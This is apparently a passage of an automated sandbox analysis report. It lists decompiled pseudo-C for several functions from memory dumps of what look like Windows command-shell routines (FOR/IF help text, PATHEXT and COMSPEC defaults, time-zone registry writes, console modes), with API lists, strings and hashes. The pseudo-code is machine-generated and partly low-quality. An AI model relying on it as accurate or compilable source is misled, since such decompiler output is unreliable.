                                • API String ID: 402402107-258546922
                                • Opcode ID: 3c78b073604a3bc050763212058a2661f2ec195bb66d1554eb422bb81e832ab9
                                • Instruction ID: 1ef160034184ac509a391f59838726ae569979c8210e4527c966fe24e3b4b853
                                • Opcode Fuzzy Hash: 3c78b073604a3bc050763212058a2661f2ec195bb66d1554eb422bb81e832ab9
                                • Instruction Fuzzy Hash: 53F1F5B2D20209EFCF12DFD8C9809EEB7B9BF08344F15446AE509A7254E7349A45DF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55D1D3, Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 314COMMON
                                Download Yara Rule
                                C-Code - Quality: 54%
                                			E4A55D1D3(intOrPtr __ecx, char* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t69;
				signed int _t74;
				signed int _t81;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr* _t98;
				signed char _t110;
				signed int _t112;
				intOrPtr _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				char* _t123;
				intOrPtr _t124;
				intOrPtr* _t125;

				_t118 = __ecx;
				_t125 = _a4;
				_t69 =  *_t125;
				if(_t69 > 0x37) {
					__eflags = _t69 - 0x38;
					if(__eflags == 0) {
						E4A55D23C(_a8, _a12,  *((intOrPtr*)(_t125 + 0x38)), 1);
						_push(_a12);
						L82:
						_push(_a8);
						_push( *(_t125 + 0x3c));
						L8:
						E4A55D1D3(_t118);
						L7:
						return 0;
					}
					if(__eflags <= 0) {
						L14:
						__imp__longjmp(0x4a574ac0, 0xffffffff);
						L15:
						_t121 = _a12;
						_t114 = _a8;
						E4A55D23C(_t114, _t121,  *((intOrPtr*)(_t125 + 0x38)), 1);
						_t74 =  *(_t125 + 0x3c);
						__eflags =  *_t74 - 0x38;
						if( *_t74 == 0x38) {
							_t74 =  *(_t74 + 0x3c);
						}
						__eflags =  *((intOrPtr*)(_t74 + 0x40)) - 2;
						if( *((intOrPtr*)(_t74 + 0x40)) == 2) {
							E4A55D23C(_t114, _t121, E4A556098, 1);
						}
						E4A55D1D3(_t118,  *(_t125 + 0x3c), _t114, _t121);
						E4A55D1D3(_t118,  *((intOrPtr*)(_t125 + 0x40)), _t114, _t121);
						__eflags =  *(_t125 + 0x48);
						if( *(_t125 + 0x48) == 0) {
							goto L7;
						} else {
							E4A55D23C(_t114, _t121,  *((intOrPtr*)(_t125 + 0x44)), 1);
							_push(_t121);
							_push(_t114);
							_push( *(_t125 + 0x48));
							goto L8;
						}
					}
					__eflags = _t69 - 0x3a;
					if(_t69 <= 0x3a) {
						__eflags =  *0x4a574081;
						_a4 = 0x4a563da0;
						if( *0x4a574081 != 0) {
							_t84 =  *((intOrPtr*)(_t125 + 0x44));
							__eflags = _t84 - 1;
							if(_t84 != 1) {
								__eflags = _t84 - 2;
								if(_t84 != 2) {
									__eflags = _t84 - 3;
									if(_t84 != 3) {
										__eflags = _t84 - 4;
										if(_t84 != 4) {
											__eflags = _t84 - 5;
											if(_t84 != 5) {
												__eflags = _t84 - 6;
												if(_t84 == 6) {
													_a4 = L"GEQ ";
												}
											} else {
												_a4 = L"GTR ";
											}
										} else {
											_a4 = L"LEQ ";
										}
									} else {
										_a4 = L"LSS ";
									}
								} else {
									_a4 = L"NEQ ";
								}
							} else {
								_a4 = L"EQU ";
							}
						}
						_t122 = _a12;
						_t115 = _a8;
						E4A55D23C(_t115, _t122,  *((intOrPtr*)(_t125 + 0x38)), 1);
						E4A55D23C(_t115, _t122, _a4, 0);
						_t81 =  *(_t125 + 0x3c);
						__eflags = _t81;
						if(_t81 != 0) {
							E4A55D23C(_t115, _t122, _t81, 0);
						}
						_push(_t122);
						_push(_t115);
						L6:
						_push(_t125);
						E4A55D0FE(_t118);
						goto L7;
					}
					__eflags = _t69 - 0x3b;
					if(_t69 == 0x3b) {
						L48:
						_t116 = _a12;
						E4A55D0FE(_t118, _t125, _a8, _t116);
						_t86 =  *_t125;
						__eflags = _t86 - 0x2e;
						if(_t86 < 0x2e) {
							L61:
							_t123 = _a4;
							L62:
							E4A55D1D3(_t118,  *((intOrPtr*)(_t125 + 0x38)), _a8, _t116);
							E4A55D23C(_a8, _t116, _t123, 1);
							_t89 =  *_t125;
							__eflags = _t89 - 0x33;
							if(_t89 == 0x33) {
								goto L7;
							}
							__eflags = _t89 - 0x3b;
							if(_t89 == 0x3b) {
								goto L7;
							}
							_push(_t116);
							goto L82;
						}
						__eflags = _t86 - 0x2f;
						if(_t86 <= 0x2f) {
							_t123 = E4A55272C;
							goto L62;
						}
						__eflags = _t86 - 0x30;
						if(_t86 == 0x30) {
							_t123 = E4A552A7C;
							goto L62;
						}
						__eflags = _t86 - 0x31;
						if(_t86 == 0x31) {
							_t123 = E4A552A58;
							goto L62;
						}
						__eflags = _t86 - 0x32;
						if(_t86 == 0x32) {
							_t123 = E4A552728;
							goto L62;
						}
						__eflags = _t86 - 0x33;
						if(_t86 == 0x33) {
							E4A55D23C(_a8, _t116, 0x4a56bd04, 1);
							_t123 = E4A552A84;
							goto L62;
						}
						__eflags = _t86 - 0x3b;
						if(_t86 != 0x3b) {
							goto L61;
						}
						E4A55D23C(_a8, _t116, 0x4a56bd08, 1);
						_t123 = E4A5525B8;
						goto L62;
					}
					__eflags = _t69 - 0x3c;
					if(_t69 != 0x3c) {
						goto L14;
					}
					_t92 =  *0x4a590918; // 0x0
					__eflags = _t92 - 0x2396;
					if(_t92 != 0x2396) {
						__eflags = _t92 - 0x2395;
						if(_t92 != 0x2395) {
							__eflags = _t92 - 0x2390;
							if(_t92 != 0x2390) {
								goto L14;
							}
							_push(1);
							_push(L"REM /?");
							L47:
							_push(_a12);
							_push(_a8);
							E4A55D23C();
							goto L7;
						}
						_push(1);
						_push(L"IF /?");
						goto L47;
					}
					_push(1);
					_push(L"FOR /?");
					goto L47;
				}
				if(_t69 >= 0x34 || _t69 == 0) {
					L3:
					E4A55D23C(_a8, _a12,  *((intOrPtr*)(_t125 + 0x38)), 1);
					_t95 =  *(_t125 + 0x3c);
					if( *(_t125 + 0x3c) != 0) {
						E4A55D23C(_a8, _a12, _t95, 0);
					}
					_push(_a12);
					_push(_a8);
					goto L6;
				} else {
					__eflags = _t69 - 0x2b;
					if(_t69 == 0x2b) {
						_t124 = _a12;
						_t117 = _a8;
						E4A55D23C(_t117, _t124, "FOR", 1);
						__eflags =  *0x4a574081;
						if( *0x4a574081 == 0) {
							L33:
							_t98 = 0x4a5745e8;
							do {
								_t119 =  *_t98;
								_t98 = _t98 + 2;
								__eflags = _t119;
							} while (_t119 != 0);
							_t118 =  *((intOrPtr*)(_t125 + 0x38));
							E4A55D23C(_t117, _t124,  *((intOrPtr*)(_t125 + 0x38)) + (_t98 - 0x4a5745ea >> 1) * 2, 1);
							E4A55D23C(_t117, _t124, 0x4a56bd04, 1);
							E4A55D23C(_t117, _t124,  *(_t125 + 0x3c), 0);
							E4A55D23C(_t117, _t124, E4A552A84, 0);
							E4A55D23C(_t117, _t124,  *((intOrPtr*)(_t125 + 0x38)) + 0x2c, 1);
							_push(_t124);
							_push(_t117);
							_push( *((intOrPtr*)(_t125 + 0x40)));
							goto L8;
						}
						_t110 =  *(_t125 + 0x48);
						__eflags = _t110 & 0x00000001;
						if((_t110 & 0x00000001) == 0) {
							__eflags = _t110 & 0x00000002;
							if((_t110 & 0x00000002) == 0) {
								__eflags = _t110 & 0x00000008;
								if((_t110 & 0x00000008) == 0) {
									__eflags = _t110 & 0x00000004;
									if((_t110 & 0x00000004) == 0) {
										goto L33;
									}
									_push(1);
									_push(0x4a574608);
									L30:
									_push(_t124);
									_push(_t117);
									E4A55D23C();
									_t112 =  *(_t125 + 0x4c);
									__eflags = _t112;
									if(_t112 == 0) {
										goto L33;
									}
									_push(1);
									_push(_t112);
									goto L32;
								}
								_push(1);
								_push(0x4a574600);
								goto L30;
							} else {
								_push(1);
								_push(0x4a5745f8);
								goto L32;
							}
						} else {
							_push(1);
							_push(0x4a5745f0);
							L32:
							_push(_t124);
							_push(_t117);
							E4A55D23C();
							goto L33;
						}
					}
					__eflags = _t69 - 0x2c;
					if(_t69 == 0x2c) {
						goto L15;
					}
					__eflags = _t69 - 0x2d;
					if(__eflags == 0) {
						goto L3;
					}
					if(__eflags <= 0) {
						goto L14;
					}
					__eflags = _t69 - 0x33;
					if(_t69 <= 0x33) {
						goto L48;
					}
					goto L14;
				}
			}























                                0x4a55d1d3
                                0x4a55d1da
                                0x4a55d1dd
                                0x4a55d1e3
                                0x4a567427
                                0x4a56742a
                                0x4a5675eb
                                0x4a5675f0
                                0x4a5675f3
                                0x4a5675f3
                                0x4a5675f6
                                0x4a55d230
                                0x4a55d230
                                0x4a55d229
                                0x4a55d22d
                                0x4a55d22d
                                0x4a567430
                                0x4a5672e3
                                0x4a5672ea
                                0x4a5672f0
                                0x4a5672f0
                                0x4a5672f3
                                0x4a5672fd
                                0x4a567302
                                0x4a567305
                                0x4a567308
                                0x4a56730a
                                0x4a56730a
                                0x4a56730d
                                0x4a567311
                                0x4a56731c
                                0x4a56731c
                                0x4a567326
                                0x4a567330
                                0x4a567335
                                0x4a567339
                                0x00000000
                                0x4a56733f
                                0x4a567346
                                0x4a56734b
                                0x4a56734c
                                0x4a56734d
                                0x00000000
                                0x4a56734d
                                0x4a567339
                                0x4a567436
                                0x4a567439
                                0x4a567545
                                0x4a56754c
                                0x4a567553
                                0x4a567555
                                0x4a567558
                                0x4a56755b
                                0x4a567566
                                0x4a567569
                                0x4a567574
                                0x4a567577
                                0x4a567582
                                0x4a567585
                                0x4a567590
                                0x4a567593
                                0x4a56759e
                                0x4a5675a1
                                0x4a5675a3
                                0x4a5675a3
                                0x4a567595
                                0x4a567595
                                0x4a567595
                                0x4a567587
                                0x4a567587
                                0x4a567587
                                0x4a567579
                                0x4a567579
                                0x4a567579
                                0x4a56756b
                                0x4a56756b
                                0x4a56756b
                                0x4a56755d
                                0x4a56755d
                                0x4a56755d
                                0x4a56755b
                                0x4a5675aa
                                0x4a5675ad
                                0x4a5675b7
                                0x4a5675c3
                                0x4a5675c8
                                0x4a5675cb
                                0x4a5675cd
                                0x4a5675d4
                                0x4a5675d4
                                0x4a5675d9
                                0x4a5675da
                                0x4a55d221
                                0x4a55d221
                                0x4a55d222
                                0x00000000
                                0x4a55d222
                                0x4a56743f
                                0x4a567442
                                0x4a567494
                                0x4a567494
                                0x4a56749c
                                0x4a5674a1
                                0x4a5674a3
                                0x4a5674a6
                                0x4a567510
                                0x4a567510
                                0x4a567513
                                0x4a56751a
                                0x4a567526
                                0x4a56752b
                                0x4a56752d
                                0x4a567530
                                0x00000000
                                0x00000000
                                0x4a567536
                                0x4a567539
                                0x00000000
                                0x00000000
                                0x4a56753f
                                0x00000000
                                0x4a56753f
                                0x4a5674a8
                                0x4a5674ab
                                0x4a567509
                                0x00000000
                                0x4a567509
                                0x4a5674ad
                                0x4a5674b0
                                0x4a567502
                                0x00000000
                                0x4a567502
                                0x4a5674b2
                                0x4a5674b5
                                0x4a5674fb
                                0x00000000
                                0x4a5674fb
                                0x4a5674b7
                                0x4a5674ba
                                0x4a5674f4
                                0x00000000
                                0x4a5674f4
                                0x4a5674bc
                                0x4a5674bf
                                0x4a5674e8
                                0x4a5674ed
                                0x00000000
                                0x4a5674ed
                                0x4a5674c1
                                0x4a5674c4
                                0x00000000
                                0x00000000
                                0x4a5674d1
                                0x4a5674d6
                                0x00000000
                                0x4a5674d6
                                0x4a567444
                                0x4a567447
                                0x00000000
                                0x00000000
                                0x4a56744d
                                0x4a567452
                                0x4a567457
                                0x4a567462
                                0x4a567467
                                0x4a567472
                                0x4a567477
                                0x00000000
                                0x00000000
                                0x4a56747d
                                0x4a56747f
                                0x4a567484
                                0x4a567484
                                0x4a567487
                                0x4a56748a
                                0x00000000
                                0x4a56748a
                                0x4a567469
                                0x4a56746b
                                0x00000000
                                0x4a56746b
                                0x4a567459
                                0x4a56745b
                                0x00000000
                                0x4a56745b
                                0x4a55d1ec
                                0x4a55d1f6
                                0x4a55d201
                                0x4a55d206
                                0x4a55d20b
                                0x4a55d216
                                0x4a55d216
                                0x4a55d21b
                                0x4a55d21e
                                0x00000000
                                0x4a5672c1
                                0x4a5672c1
                                0x4a5672c4
                                0x4a567355
                                0x4a567358
                                0x4a567364
                                0x4a567369
                                0x4a567370
                                0x4a5673bf
                                0x4a5673bf
                                0x4a5673c7
                                0x4a5673c7
                                0x4a5673cb
                                0x4a5673cc
                                0x4a5673cc
                                0x4a5673d1
                                0x4a5673e0
                                0x4a5673ee
                                0x4a5673fa
                                0x4a567408
                                0x4a567418
                                0x4a56741d
                                0x4a56741e
                                0x4a56741f
                                0x00000000
                                0x4a56741f
                                0x4a567372
                                0x4a567375
                                0x4a567377
                                0x4a567382
                                0x4a567384
                                0x4a56738f
                                0x4a567391
                                0x4a56739c
                                0x4a56739e
                                0x00000000
                                0x00000000
                                0x4a5673a0
                                0x4a5673a2
                                0x4a5673a7
                                0x4a5673a7
                                0x4a5673a8
                                0x4a5673a9
                                0x4a5673ae
                                0x4a5673b1
                                0x4a5673b3
                                0x00000000
                                0x00000000
                                0x4a5673b5
                                0x4a5673b7
                                0x00000000
                                0x4a5673b7
                                0x4a567393
                                0x4a567395
                                0x00000000
                                0x4a567386
                                0x4a567386
                                0x4a567388
                                0x00000000
                                0x4a567388
                                0x4a567379
                                0x4a567379
                                0x4a56737b
                                0x4a5673b8
                                0x4a5673b8
                                0x4a5673b9
                                0x4a5673ba
                                0x00000000
                                0x4a5673ba
                                0x4a567377
                                0x4a5672ca
                                0x4a5672cd
                                0x00000000
                                0x00000000
                                0x4a5672cf
                                0x4a5672d2
                                0x00000000
                                0x00000000
                                0x4a5672d8
                                0x00000000
                                0x00000000
                                0x4a5672da
                                0x4a5672dd
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5672dd

                                APIs
                                • longjmp.MSVCRT(4A574AC0,000000FF,00000000,?,00002000,?,4A55D199,00000000,-00000003,00004000,-00000003,00004000, /D /c",?,?,4A55D126), ref: 4A5672EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: longjmp
                                • String ID: EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                • API String ID: 1832741078-3035295614
                                • Opcode ID: aef98035b3baced41b6a87960f614d804fa3b8807df0efae1408c77cd9226d39
                                • Instruction ID: 8293e8344f078bb8eb96d78ef3d0a6bbd5fbdd1edd82b69a78a1f2a45a913b6e
                                • Opcode Fuzzy Hash: aef98035b3baced41b6a87960f614d804fa3b8807df0efae1408c77cd9226d39
                                • Instruction Fuzzy Hash: D8A1B2B2110241BBEF719E60CF80F9B3F6AEFA5750F224806F909EE56AC771D5818720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0232822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                Download Yara Rule
                                C-Code - Quality: 95%
                                			E0232822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E02345A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E02345A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E022E7DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E0232810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E0232810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E0232810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E0232810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E0232810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E0232810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E0232810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E0232810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E0232810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E0232810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E0228F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}













                                0x02328231
                                0x02328235
                                0x0232823a
                                0x02328245
                                0x0232824b
                                0x0232825c
                                0x02328262
                                0x02328263
                                0x02328266
                                0x02328268
                                0x00000000
                                0x0232826a
                                0x02328270
                                0x02328275
                                0x02328277
                                0x02328295
                                0x02328297
                                0x0232838d
                                0x02328391
                                0x023283a9
                                0x023283ab
                                0x023283ad
                                0x023283b6
                                0x023283b9
                                0x00000000
                                0x023283b9
                                0x0232829d
                                0x0232829d
                                0x023282b6
                                0x023282b8
                                0x00000000
                                0x023282be
                                0x023282c0
                                0x023282d5
                                0x023282d7
                                0x00000000
                                0x023282dd
                                0x023282f3
                                0x023282f5
                                0x00000000
                                0x023282fb
                                0x02328317
                                0x02328319
                                0x00000000
                                0x0232831b
                                0x02328332
                                0x02328334
                                0x00000000
                                0x02328336
                                0x0232834f
                                0x02328351
                                0x00000000
                                0x02328353
                                0x02328353
                                0x0232835a
                                0x00000000
                                0x0232835c
                                0x02328378
                                0x0232837a
                                0x0232837c
                                0x02328385
                                0x02328388
                                0x023283bc
                                0x023283cf
                                0x023283cf
                                0x0232837c
                                0x0232835a
                                0x02328351
                                0x02328334
                                0x02328319
                                0x023282f5
                                0x023282d7
                                0x023282b8
                                0x023283d4
                                0x023283d9
                                0x023283d9
                                0x02328277
                                0x0232824d
                                0x0232824d
                                0x0232824d
                                0x0232824d
                                0x023283df

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _wcsnlen
                                • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                • API String ID: 3628947076-1387797911
                                • Opcode ID: d180eeefa3a0ba6228a08f486c61a0bf75c5ad4e4e09825e4b6259cc7da07574
                                • Instruction ID: 9f5a2956e8160258b2ef524b02af4180992dd842a27578636facdedf033e3d30
                                • Opcode Fuzzy Hash: d180eeefa3a0ba6228a08f486c61a0bf75c5ad4e4e09825e4b6259cc7da07574
                                • Instruction Fuzzy Hash: 4241A276240328BAFB219AE1CD81FDEB7ADAF04748F004512BB0596190D7B1FA199BB4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5586C9, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 101COMMON
                                Download Yara Rule
                                C-Code - Quality: 52%
                                			E4A5586C9(long __ebx, char* __edi, void* __esi) {
				void* _t15;
				WCHAR* _t17;
				void* _t22;
				long _t26;
				short _t31;
				short* _t33;
				signed int _t38;
				WCHAR* _t40;

				_t34 = __edi;
				_t26 = __ebx;
				_push(__ebx);
				_push(__edi);
				_t40 = E4A551896(0x208);
				if(_t40 == 0) {
					_push(1);
					E4A5572E9(__edi, _t40);
					L9:
					E4A551730(_t34, E4A553AFC);
					L2:
					_t35 = L"PATHEXT";
					if(E4A552070(L"PATHEXT") == 0) {
						E4A551730(_t35, L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
					}
					_t36 = L"PROMPT";
					if(E4A552070(L"PROMPT") == 0) {
						E4A551730(_t36, L"$P$G");
					}
					if(E4A552070(L"COMSPEC") == 0) {
						if(E4A5518EB(_t40, 0x2e) != 0) {
							L18:
							E4A551730(L"COMSPEC", _t40);
							goto L5;
						}
						__imp___wcsupr( *0x4a590648);
						_t17 = _t40;
						_t1 =  &(_t17[1]); // 0x2
						_t33 = _t1;
						do {
							_t31 =  *_t17;
							_t17 =  &(_t17[1]);
						} while (_t31 != 0);
						_t38 = _t17 - _t33 >> 1;
						_t22 = E4A552148(_t40,  *0x4a590664 & 0x0000ffff);
						_t3 = _t38 * 2; // -2
						if(_t40 + _t3 - 2 == _t22) {
							_push( &M4A5749B6);
						} else {
							_push(L"\\CMD.EXE");
						}
						_push(_t26);
						_push(_t40);
						E4A5520A9(_t40);
						goto L18;
					} else {
						L5:
						_t15 = E4A552070(L"KEYS");
						if(_t15 != 0) {
							__imp___wcsicmp(_t15, 0x4a56bd54);
							if(_t15 == 0) {
								 *0x4a5906bc = 1;
							}
						}
						return E4A557267(0x4a575260);
					}
				}
				_t26 = 0x104;
				GetModuleFileNameW(0, _t40, 0x104);
				_t34 = L"PATH";
				if(E4A552070(L"PATH") == 0) {
					goto L9;
				}
				goto L2;
			}











                                0x4a5586c9
                                0x4a5586c9
                                0x4a5586cb
                                0x4a5586cd
                                0x4a5586d8
                                0x4a5586dc
                                0x4a56694c
                                0x4a56694e
                                0x4a566953
                                0x4a566959
                                0x4a558704
                                0x4a558704
                                0x4a558711
                                0x4a566969
                                0x4a566969
                                0x4a558717
                                0x4a558724
                                0x4a55bd40
                                0x4a55bd40
                                0x4a558736
                                0x4a56697d
                                0x4a5669ca
                                0x4a5669d0
                                0x00000000
                                0x4a5669d0
                                0x4a566985
                                0x4a56698b
                                0x4a56698e
                                0x4a56698e
                                0x4a566991
                                0x4a566991
                                0x4a566995
                                0x4a566996
                                0x4a56699f
                                0x4a5669aa
                                0x4a5669af
                                0x4a5669b5
                                0x4a5669be
                                0x4a5669b7
                                0x4a5669b7
                                0x4a5669b7
                                0x4a5669c3
                                0x4a5669c4
                                0x4a5669c5
                                0x00000000
                                0x4a55873c
                                0x4a55873c
                                0x4a558741
                                0x4a55874b
                                0x4a5669e0
                                0x4a5669ea
                                0x4a5669f0
                                0x4a5669f0
                                0x4a5669ea
                                0x4a55875b
                                0x4a55875b
                                0x4a558736
                                0x4a5586e2
                                0x4a5586eb
                                0x4a5586f1
                                0x4a5586fe
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                  • Part of subcall function 4A551896: GetProcessHeap.KERNEL32(00000008,4A5525C0,4A5525BB,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C), ref: 4A5518A9
                                  • Part of subcall function 4A551896: HeapAlloc.KERNEL32(00000000,?,4A5519FD,4A5525BA,00000001,00000000,?,4A557037,4A5525B8,4A557238,00000228,4A556C92,4A5525B8,0000233C,?,4A556CE6), ref: 4A5518B0
                                • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,4A575260,4A588640,00000104,4A55858C,4A575260,00000104,00000000,4A588640,00002000,00000000), ref: 4A5586EB
                                  • Part of subcall function 4A552070: GetEnvironmentVariableW.KERNEL32(?,4A580640,00002000,74CBF670,?,?,4A55BEFF,00000000), ref: 4A55208E
                                • _wcsupr.MSVCRT ref: 4A566985
                                • _wcsicmp.MSVCRT ref: 4A5669E0
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Heap$AllocEnvironmentFileModuleNameProcessVariable_wcsicmp_wcsupr
                                • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                • API String ID: 4117198927-4197029667
                                • Opcode ID: fc7663adf1c36916c75c37dc28a140d7b599aafe5f5f7a214ae1f4659d518251
                                • Instruction ID: d23d879c2edcb3bbd4c12cecd3d378251818726210346a485db34e15ef1c2828
                                • Opcode Fuzzy Hash: fc7663adf1c36916c75c37dc28a140d7b599aafe5f5f7a214ae1f4659d518251
                                • Instruction Fuzzy Hash: E821C7B511620376A2163335CF48E7F1DACAFD16A5F060913FA05FD85EEF68C901D2A2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A551605, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                C-Code - Quality: 25%
                                			E4A551605() {
				int _t7;
				signed int _t8;
				signed int _t10;
				signed int _t14;
				intOrPtr* _t27;

				_t27 = __imp___get_osfhandle;
				SetConsoleMode( *_t27( *0x4a5741ac), 1);
				_push(0x4a5741ac);
				if(GetConsoleMode( *_t27(), 1) != 0) {
					_t14 =  *0x4a5741ac; // 0x0
					if((_t14 & 0x00000003) != 3) {
						 *0x4a5741ac =  *0x4a5741ac | 0x00000003;
						SetConsoleMode( *_t27( *0x4a5741ac), 1);
					}
				}
				_t7 = GetConsoleMode( *_t27(0x4a5741b0), 0);
				if(_t7 == 0) {
					L7:
					return _t7;
				} else {
					_t8 =  *0x4a5741b0; // 0x0
					if((_t8 & 0x00000007) != 7 || (_t8 & 0x00000010) != 0) {
						_t10 = _t8 & 0xffffffef | 0x00000007;
						 *0x4a5741b0 = _t10;
						SetConsoleMode( *_t27(_t10), 0);
					}
					_t7 =  *0x4a5741f4; // 0x0
					if(_t7 == 0) {
						goto L7;
					} else {
						return  *_t7(L"CMD.EXE");
					}
				}
			}








                                0x4a551609
                                0x4a551622
                                0x4a551624
                                0x4a551639
                                0x4a55163b
                                0x4a551645
                                0x4a558d8d
                                0x4a558da0
                                0x4a558da0
                                0x4a551645
                                0x4a551656
                                0x4a55165a
                                0x4a55168a
                                0x4a55168a
                                0x4a55165c
                                0x4a55165c
                                0x4a551669
                                0x4a55bc32
                                0x4a55bc38
                                0x4a55bc41
                                0x4a55bc41
                                0x4a551677
                                0x4a55167e
                                0x00000000
                                0x4a551680
                                0x00000000
                                0x4a551685
                                0x4a55167e

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ConsoleMode_get_osfhandle
                                • String ID: CMD.EXE
                                • API String ID: 1606018815-3025314500
                                • Opcode ID: 177d4eaa29e840d90ef5747f0178ba0573df95c0f8d96539366d04ee3e3bf573
                                • Instruction ID: 86c9c3e9d6f5fd42210bbdbaffebdb4caad96995e6bdc6b35c0cfe4bbf541275
                                • Opcode Fuzzy Hash: 177d4eaa29e840d90ef5747f0178ba0573df95c0f8d96539366d04ee3e3bf573
                                • Instruction Fuzzy Hash: 801173B5681605AEEA0076E4DE45F662FBCEB92364F150413E201E3998EBB5DC00CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5579A4, Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 146memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 4A5579E8
                                • HeapAlloc.KERNEL32(00000000), ref: 4A5579F1
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 4A557A05
                                • HeapAlloc.KERNEL32(00000000), ref: 4A557A08
                                • _wcsicmp.MSVCRT ref: 4A557AA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
